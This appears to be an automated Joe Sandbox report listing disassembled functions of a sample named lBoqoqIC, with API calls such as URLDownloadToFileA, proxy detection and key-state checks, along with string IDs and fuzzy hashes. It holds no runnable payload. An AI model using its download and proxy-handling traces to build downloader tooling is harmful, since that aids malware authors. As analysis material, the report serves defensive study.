                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ShowWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1268545403-0
                                                                                                                • Opcode ID: 7bfa3681f46127cd04076910ce2e6fe2432e97ec53505bfe2142a80de136bdac
                                                                                                                • Instruction ID: dfe27634e7d182de6a9ca053cd276e1a2950ad64effb85482d5a9f8fee7fd842
                                                                                                                • Opcode Fuzzy Hash: 7bfa3681f46127cd04076910ce2e6fe2432e97ec53505bfe2142a80de136bdac
                                                                                                                • Instruction Fuzzy Hash: 23D09E35304200FFCB458F60D948E167BA1BF94705F2045B9F1458A165D736CC12EB45
                                                                                                                Function 0049AF10 Relevance: 1.4, APIs: 1, Instructions: 126COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,00000318,00000000,00000000,0049DCC4,?), ref: 0049AF19
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value
                                                                                                                • String ID:
                                                                                                                • API String ID: 3702945584-0
                                                                                                                • Opcode ID: 7c48532714199b99f88cb2d6722789347f906474db233065fa66e4fd602f10d7
                                                                                                                • Instruction ID: 7bbf17f8638fa34963296a8da90bb3ca29cc3c8c013688301d4745ba2267ddc5
                                                                                                                • Opcode Fuzzy Hash: 7c48532714199b99f88cb2d6722789347f906474db233065fa66e4fd602f10d7
                                                                                                                • Instruction Fuzzy Hash: 0F4162F1A01B009BEA20DF769841997FBE5FB90314F144C3FE56E87302EB35A8058B96
                                                                                                                Function 00408B73 Relevance: 1.4, APIs: 1, Instructions: 111sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 3472027048-0
                                                                                                                • Opcode ID: 427134f21cdecd7a157666b998ac20670996af605c20c15835f389f0d615bae8
                                                                                                                • Instruction ID: e8b172bd776e517c80a1537b670a1ab67c6d30d51809ca01058fddb25c9e2994
                                                                                                                • Opcode Fuzzy Hash: 427134f21cdecd7a157666b998ac20670996af605c20c15835f389f0d615bae8
                                                                                                                • Instruction Fuzzy Hash: 734147B1A0520ACFEB10CF58C685AEEBBB0FF54354F14816AED41A7391D734AA91CB94
                                                                                                                Function 100051C0 Relevance: 1.3, APIs: 1, Instructions: 44sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(000000C8,00000001,00000000,00000000,?,00000000,?,10003493,?,00000000,10005FD3,?,?,10003493,?,00000000), ref: 100051F3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 3472027048-0
                                                                                                                • Opcode ID: a944703de658dfee16fd52c57443025f366aa61193535bc0aaea3e0d96b4f2c7
                                                                                                                • Instruction ID: c47b54039767993dcd9211b2d7996eb4c282f8e27b28bb2914e46aa7ad9f0d55
                                                                                                                • Opcode Fuzzy Hash: a944703de658dfee16fd52c57443025f366aa61193535bc0aaea3e0d96b4f2c7
                                                                                                                • Instruction Fuzzy Hash: 37F0A93610010CBAEF029F89AC41EDFBB69FF9D2A0F018156FE445602186739822ABB1

                                                                                                                Non-executed Functions

                                                                                                                Function 0041C471 Relevance: 49.3, APIs: 18, Strings: 10, Instructions: 341libraryloaderfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0041C476
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 0041C52F
                                                                                                                • GetTempFileNameA.KERNEL32(?,IRWIN,00000000,?), ref: 0041C549
                                                                                                                • SetFileAttributesA.KERNEL32(?,00000080), ref: 0041C55B
                                                                                                                • DeleteFileA.KERNEL32(?), ref: 0041C568
                                                                                                                • LoadLibraryA.KERNEL32(wininet.dll), ref: 0041C62B
                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetQueryOptionA), ref: 0041C63E
                                                                                                                • GetProcAddress.KERNEL32(?,DetectAutoProxyUrl), ref: 0041C69E
                                                                                                                • GlobalFree.KERNEL32(?), ref: 0041C6C9
                                                                                                                • GlobalFree.KERNEL32(?), ref: 0041C6D7
                                                                                                                • GlobalFree.KERNEL32(?), ref: 0041C6E5
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0041C6EE
                                                                                                                • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0041C70E
                                                                                                                • LoadLibraryA.KERNEL32(jsproxy.dll), ref: 0041C720
                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetInitializeAutoProxyDll), ref: 0041C733
                                                                                                                • GetProcAddress.KERNEL32(?,InternetGetProxyInfo), ref: 0041C7F3
                                                                                                                • GetProcAddress.KERNEL32(?,InternetDeInitializeAutoProxyDll), ref: 0041C851
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0041C88C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressFreeProc$FileLibrary$Global$LoadTemp$AttributesDeleteDownloadH_prologIncrementInterlockedNamePathlstrlen
                                                                                                                • String ID: %s; DIRECT$0:R$DetectAutoProxyUrl$IRWIN$InternetDeInitializeAutoProxyDll$InternetGetProxyInfo$InternetInitializeAutoProxyDll$InternetQueryOptionA$jsproxy.dll$wininet.dll
                                                                                                                • API String ID: 989166556-3321067483
                                                                                                                • Opcode ID: efe7fcad68390f728cb24e32e576bbca83cb88dfdf2b8267f6d9fb835b04bd5a
                                                                                                                • Instruction ID: ef1c6708a2ff59c9dad073d53bd849c5176ff981abfff4362f351de8a9fad1b9
                                                                                                                • Opcode Fuzzy Hash: efe7fcad68390f728cb24e32e576bbca83cb88dfdf2b8267f6d9fb835b04bd5a
                                                                                                                • Instruction Fuzzy Hash: D5D15D71C4025DEEDB11EBA4CD85FEEBBB8AF18304F1040AEE505B2191D7785A89CF69
                                                                                                                Function 004D4165 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 99libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(CTL3D32.DLL,004D32FB,?,00000000,00479292,00523A30), ref: 004D4198
                                                                                                                • GetProcAddress.KERNEL32(00000000,0000000C), ref: 004D41AF
                                                                                                                • GetProcAddress.KERNEL32(?,0000000D), ref: 004D41B9
                                                                                                                • GetProcAddress.KERNEL32(?,00000010), ref: 004D41C3
                                                                                                                • GetProcAddress.KERNEL32(?,00000018), ref: 004D41CD
                                                                                                                • GetProcAddress.KERNEL32(?,00000006), ref: 004D41D7
                                                                                                                • GetProcAddress.KERNEL32(?,00000015), ref: 004D41E1
                                                                                                                • GetProcAddress.KERNEL32(?,00000016), ref: 004D41EB
                                                                                                                • GetProcAddress.KERNEL32(?,00000003), ref: 004D41F5
                                                                                                                • GetProcAddress.KERNEL32(?,00000019), ref: 004D41FF
                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00479292,00523A30), ref: 004D4250
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                • String ID: CTL3D32.DLL
                                                                                                                • API String ID: 2449869053-1520792465
                                                                                                                • Opcode ID: 8a27f104601e640dba62294eb09a98eecf867229d648ab1f1f78787c4c4c02a6
                                                                                                                • Instruction ID: fca0b3f50d73b38cf55783f4ca59ae31764bdc6f52519776f71bc2280243320e
                                                                                                                • Opcode Fuzzy Hash: 8a27f104601e640dba62294eb09a98eecf867229d648ab1f1f78787c4c4c02a6
                                                                                                                • Instruction Fuzzy Hash: 8331E7B0900B41DFD730AF62D894A27FAE0FF84745B008A7FE19A86A60D775A885DF44
                                                                                                                Function 00414AF3 Relevance: 6.1, APIs: 4, Instructions: 122stringcomCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CoCreateInstance.COMBASE(004F0940,00000000,00000001,004F0950,?), ref: 00414B2B
                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 00414B48
                                                                                                                • lstrlen.KERNEL32(?,?,00000104), ref: 00414BF5
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000), ref: 00414C05
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharCreateInstanceMultiWidelstrcpylstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3671088469-0
                                                                                                                • Opcode ID: e58c8b2767dd72bc0355bbb605f17906259b4d2376c1e461499f36f5aae7ad97
                                                                                                                • Instruction ID: 78b939d98803b1807cb245ac68c61ba649b68a187c194e7fdbd6ff9d850bcdeb
                                                                                                                • Opcode Fuzzy Hash: e58c8b2767dd72bc0355bbb605f17906259b4d2376c1e461499f36f5aae7ad97
                                                                                                                • Instruction Fuzzy Hash: EF41EA75A00208AFCB15DFA4C888DDAB7B9EF8C304F1049A9E606E7251DA75AE45CF50
                                                                                                                Function 004C8744 Relevance: 6.0, APIs: 4, Instructions: 38keyboardwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004C93E0: GetWindowLongA.USER32(?,000000F0), ref: 004C93EC
                                                                                                                • GetKeyState.USER32(00000010), ref: 004C8768
                                                                                                                • GetKeyState.USER32(00000011), ref: 004C8771
                                                                                                                • GetKeyState.USER32(00000012), ref: 004C877A
                                                                                                                • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 004C8790
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: State$LongMessageSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1063413437-0
                                                                                                                • Opcode ID: c58440cf276bba1fb2e753070a553f592f410798ecd7a712afd87d9b28c5960c
                                                                                                                • Instruction ID: 5f2ece1f685465f06d40f81f558322c85fec79ddb4a189e7889e63e4cb900121
                                                                                                                • Opcode Fuzzy Hash: c58440cf276bba1fb2e753070a553f592f410798ecd7a712afd87d9b28c5960c
                                                                                                                • Instruction Fuzzy Hash: 55F0A77E3513A636E5A037661CC2FEA51144F80BD8F21093FF741AE1D19DA988025678
                                                                                                                Function 004A04A0 Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindFirstFileA.KERNEL32(?,?,?), ref: 004A04B1
                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004A04C8
                                                                                                                • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 004A04DD
                                                                                                                • FindClose.KERNEL32(00000000), ref: 004A04E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileTime$Find$CloseDateFirstLocal
                                                                                                                • String ID:
                                                                                                                • API String ID: 2659516521-0
                                                                                                                • Opcode ID: d71e27fb602cd53bae843787bef0dead24d196c0517cce9374aa923cf4baf809
                                                                                                                • Instruction ID: 2b0184bf3356b5fe652337c2ad6085dceda859ca43c6ed6b8a82855511b3d722
                                                                                                                • Opcode Fuzzy Hash: d71e27fb602cd53bae843787bef0dead24d196c0517cce9374aa923cf4baf809
                                                                                                                • Instruction Fuzzy Hash: 04F08132404212AFE310DF64DC888FB77A8EFC4354F448E3DB5A586290E638D9098B96
                                                                                                                Function 004A893C Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32(?,?,000000F0), ref: 004A895B
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004A8967
                                                                                                                • LockResource.KERNEL32(00000000), ref: 004A8972
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 2752051264-0
                                                                                                                • Opcode ID: 85eb03e311d2d0dccd8efc5da87a24713e0603720b9aaa1723f2be7801271ec2
                                                                                                                • Instruction ID: de03dbaef62dc7c655f5520c0ba82d030221b98600543bb046c194861b3e7921
                                                                                                                • Opcode Fuzzy Hash: 85eb03e311d2d0dccd8efc5da87a24713e0603720b9aaa1723f2be7801271ec2
                                                                                                                • Instruction Fuzzy Hash: ECF036B52012019FDB105F619C48E6B7BADFFE5791F05407EF645D6261CF24CC05C666
                                                                                                                Function 004746A5 Relevance: 3.0, APIs: 2, Instructions: 17sleepwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsIconic.USER32(?), ref: 004746B2
                                                                                                                  • Part of subcall function 004C9592: ShowWindow.USER32(?,?,004CA545,00000000,0000E146,00000000,?,?,0040A373), ref: 004C95A0
                                                                                                                • Sleep.KERNEL32(00000064,00000009), ref: 004746C7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconicShowSleepWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2011448064-0
                                                                                                                • Opcode ID: 6cf04397f4527dd48fc28eb9d180893c3b96b3edbb9313c547cba1cbd133835a
                                                                                                                • Instruction ID: 9359af80a719784aa630fd9b3a30eef51e90517b80814043480ce0131e65b64f
                                                                                                                • Opcode Fuzzy Hash: 6cf04397f4527dd48fc28eb9d180893c3b96b3edbb9313c547cba1cbd133835a
                                                                                                                • Instruction Fuzzy Hash: 5FD05E35310360ABD6653B22AC09F6E21656F94B09F16C12FF5069A2E1CB7C5D06865D
                                                                                                                Function 004703CD Relevance: 35.5, APIs: 3, Strings: 17, Instructions: 474windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004703D2
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 004C6286: lstrlen.KERNEL32(00000001,?,?,0040264F,?,00000000,00000000,?,00000000,00000000,?,?,00000000,?,?,00402920), ref: 004C6297
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                  • Part of subcall function 00471F70: __EH_prolog.LIBCMT ref: 00471F75
                                                                                                                • MessageBoxA.USER32(00000000,00000000,?,MSG_UPDATE_ABORT_NEEDED), ref: 00470736
                                                                                                                • MessageBoxA.USER32(00000000,00000000,?,MSG_UPDATE_RESTART_NEEDED), ref: 00470819
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0046F95E: __EH_prolog.LIBCMT ref: 0046F963
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$IncrementInterlockedMessagelstrlen
                                                                                                                • String ID: "%s:%s" "%s:%s" %s %s$"%s:%s" %s %s$.dat$.ts3$/DATFILE$/TUCPS$/TURC$0:R$Automatic update required.$Dat file updated: '%s'$MSG_UPDATE_ABORT_NEEDED$MSG_UPDATE_ABORT_TITLE$MSG_UPDATE_RESTART_NEEDED$MSG_UPDATE_RESTART_TITLE$Restarting update executable: '%s'$The source folder is not writable following rules.$The update has been aborted.
                                                                                                                • API String ID: 684416522-2187568835
                                                                                                                • Opcode ID: 4aeb9971a6bee117f000e98222649849c054bb2e9416a572fc27c7ad27a4a38b
                                                                                                                • Instruction ID: 161f0c60bef826d5ab6deda4dd7a275270dc72c749787c8c346f57a2eb6d5ea3
                                                                                                                • Opcode Fuzzy Hash: 4aeb9971a6bee117f000e98222649849c054bb2e9416a572fc27c7ad27a4a38b
                                                                                                                • Instruction Fuzzy Hash: 8B028474A1020DEFDF14EBA5C942FEE7BB9AF18304F00405EF509A3291DB786A45DB69
                                                                                                                Function 004A07D0 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 150stringfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,00000000,00000520), ref: 004A07DE
                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004A0807
                                                                                                                  • Part of subcall function 004A1F10: TlsGetValue.KERNEL32(0000001C,?,00000000,?,00000000,004A0AEA,00000065,00000000,00000104), ref: 004A1F1A
                                                                                                                  • Part of subcall function 004A1F10: lstrcpy.KERNEL32(00000000,00523A30), ref: 004A1F3E
                                                                                                                • lstrcpyn.KERNEL32(?,00000000,?,00000104), ref: 004A0824
                                                                                                                • lstrcat.KERNEL32(?,00510870), ref: 004A0845
                                                                                                                • lstrcat.KERNEL32(?,?), ref: 004A0854
                                                                                                                • wsprintfA.USER32 ref: 004A088A
                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000), ref: 004A08A9
                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000), ref: 004A08C3
                                                                                                                • lstrlen.KERNEL32(?,?,00000000), ref: 004A08DB
                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000), ref: 004A08EA
                                                                                                                • wsprintfA.USER32 ref: 004A0909
                                                                                                                • lstrlen.KERNEL32(?,?,00000000), ref: 004A091A
                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000), ref: 004A0923
                                                                                                                • WriteFile.KERNEL32(00000000,00511394,00000002,?,00000000), ref: 004A0934
                                                                                                                • wsprintfA.USER32 ref: 004A0958
